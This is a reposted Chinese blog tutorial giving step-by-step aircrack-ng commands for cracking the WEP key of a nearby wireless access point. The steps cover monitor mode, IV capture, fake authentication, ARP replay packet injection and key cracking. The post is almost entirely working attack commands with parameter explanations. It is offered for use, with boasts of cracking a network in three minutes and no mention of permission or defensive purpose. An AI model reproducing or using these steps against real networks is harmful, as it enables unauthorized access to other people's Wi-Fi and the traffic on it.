需要的全部指令:
(红色字体的需要替换自身参数)
1) ifconfig -a
(可以查看到自己机子无线网卡的MAC地址和无线网卡的设备名称<通常为usb0或者wlan0>), 保留这个窗口方便下几步查看需要的信息, 打开新命令窗口进入一步)
2) airmon-ng start wlan0 2
(wlan0为无线网卡, 2为需要监听的频道, 根据自己情况输入, 此步骤为打开无线网卡的监听模式)
3) airodump-ng –ivs -w name -c 2 wlan0
(获取频道2的所有无线AP的信息, wlan0是无线网卡, 2为频道, 这一步的频道需要跟上一步的一致, 命令输入后会显示周围所有频道为*的无线AP,
显示的列表:
BSSID : 无线AP的Mac 地址
PWR: AP信号的大小
RXQ: 干扰值
Beacons:发送和接受的数据包, 有数据传输的时候就会跳动
#Data: 数据, 破解需要的最关键的就是这个
CH:频道
MB:网络连接速度
ESSID: AP的名称
保留这一窗口, 打开新的命令窗口进入下一步)
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX wlan0 -1 is -one
(发送欺骗, ap_essid为AP的名称, 例如Linksys或者TP-Link, ap_mac为AP的MAC地址, 第三步的BSSID就是AP的MAC地址, XXXXXXXXXX 为自己无线网卡的MAC地址, 第一步可以看到. 这一步成功后会显示Successful, 如不成功需要在信号强的地方重试, 成功后才可以进入下一步)
5) aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 wlan0
(ap_mac为无线AP的mac地址, 具体看步骤3, XXXXXXXXXX 为无线网卡的mac地址, wlan0为网卡, 这一步执行以后, 开始正确的收发数据包, #Data开始上涨)
6) aircrack-ng -n 64 -b ap_mac name-01.ivs
(开始破解, ap_mac为ap的mac地址, 64指的是使用了64位加密, 多次破解失败的话可以试128)
多数情况下当#data开始迅速跳动的时候就可以开始破解了, 不需要等到多少包, 如果#data这个数据增长缓慢的话, 换个位置到无线信号强的地方再试, 命令输入正确的话最快3分钟搞定一个64位加密的web AP是没问题的!
文章来源:http://yijianfengvip.blog.163.com/blog/static/175273432201212743513725/ 自己博客
无线网络破解,破解wap密码
本文转自yjflinchong 51CTO博客,原文链接:http://blog.51cto.com/yjflinchong/1165078,如需转载请自行联系原作者